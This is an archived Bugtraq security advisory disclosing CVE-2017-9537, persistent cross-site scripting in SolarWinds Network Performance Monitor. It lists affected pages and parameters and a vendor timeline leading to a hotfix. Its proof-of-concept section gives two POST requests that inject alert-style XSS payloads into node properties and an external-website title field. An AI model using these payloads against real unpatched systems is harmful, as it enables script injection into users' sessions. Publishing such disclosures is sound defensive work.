lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201709290228.v8T2SCkm017969@sf01web3.securityfocus.com>
Date: Fri, 29 Sep 2017 02:28:12 GMT
From: andys3c@...il.com
To: bugtraq@...urityfocus.com
Subject: [CVE-2017-9537] Persistent Cross-Site Scripting Vulnerabilities

-------------------------------------------------------------
Vulnerability type: Persistent Cross-Site Scripting
-------------------------------------------------------------
Credit: Andy Tan
CVE ID: CVE-2017-9537
-----------------------------------------------
Product: SolarWinds Network Performance Monitor
-----------------------------------------------
Affected version: SolarWinds Network Performance Monitor version 12.0.15300.90 and possibly earlier
Hotfix: SolarWinds Orion Platform 2017.3 Hotfix 1

1.
Affected URL: https://<ip>/Orion/Nodes/Add/Properties.aspx
Affected parameter: City, Comments, Department
Affected functions: Group Description field, Last_XX_Events resource, Events page, and error page
Navigation: (Settings -> Manage Nodes -> Add Node)

2.
Affected Source URL: https://<ip>/Orion/Services/WebAdmin.asmx/CreateExternalWebsite
Affected parameter: FullTitle
Affected URL: https://<ip>/Orion/External.aspx?Site=<no>
Navigation: (Settings -> All Settings -> External Websites)


================
Proof of Concept
================
1.
POST /Orion/Nodes/Add/Properties.aspx HTTP/1.1

<Fill up rest of the headers>


<Fill up rest of the parameters>ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ctl06%24repCustomProperties%24ctl00%24PropertyValue%24TextBoxEditorValue=%3CIMG%20SRC%3D%20a%20onerror%3Dalert('testXSSCity')%3E&ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ctl06%24repCustomProperties%24ctl01%24PropertyValue%24TextBoxEditorValue=%3CIMG%20SRC%3D%20a%20onerror%3Dalert('testXSSComments')%3E&ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ctl06%24repCustomProperties%24ctl02%24PropertyValue%24TextBoxEditorValue=%3CIMG%20SRC%3D%20a%20onerror%3Dalert('testXSSDept')%3E

2.
POST /Orion/Services/WebAdmin.asmx/CreateExternalWebsite HTTP/1.1

<Fill up rest of the headers>



{"site":{"ID":0,"ShortTitle":"title","FullTitle":"</title><script>alert('DTPTXSS!')</script>","URL":"url"},"menuBar":"Default"}

------------------------
Vendor contact timeline:
------------------------
2017-06-12: Contacted vendor.
2017-06-23: Vendor responded that bug jury completed and vulnerability is assigned to vNext milestone.
2017-08-22: Contacted vendor again.
2017-08-23: Vendor responded that hotfix will be released for all products shipping on Orion Core 2017.3
2017-09-28: Contacted vendor again.
2017-09-28: Vendor responded that the vulnerability is addressed in the recently released Hotfix for Core 2017.3
2017-09-29: Public disclosure.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ